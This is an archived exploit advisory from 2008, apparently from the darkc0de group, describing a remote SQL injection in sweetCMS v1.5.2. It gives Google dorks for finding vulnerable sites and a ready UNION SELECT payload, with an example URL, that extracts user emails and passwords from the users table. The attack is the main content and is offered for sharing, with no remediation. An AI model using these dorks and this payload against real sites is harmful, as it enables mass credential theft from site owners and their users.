Home / exploitsPDF  

sweetcms-sql.txt

Posted on 14 October 2008

################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu # # -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE # #-r45c4l -Bond -Dapirates -underc # ################################################################ # # Author: Dapirates & underc (Lossie I.T Security Forums) # Home : www.darkc0de.com & www.lossieit.co.uk/forums # # Email : dapirates@lossieit.co.uk # # Share the c0de! # ################################################################ # # Exploit: Remote SQL Injection in sweetCMS v1.5.2 # # Soft.Site: http://www.sweetcms.com/ # # Dork:- inurl:index.php?page= # # Dork 2:- Built using sweetCMS v1.5.2 # # SQL version: 5.0.32-Debian_7etch3-log # # POC: +AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- # # Example: http://localhost/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- # # # # ################################################################ # Vuln Discovered 13/10/2008

 

TOP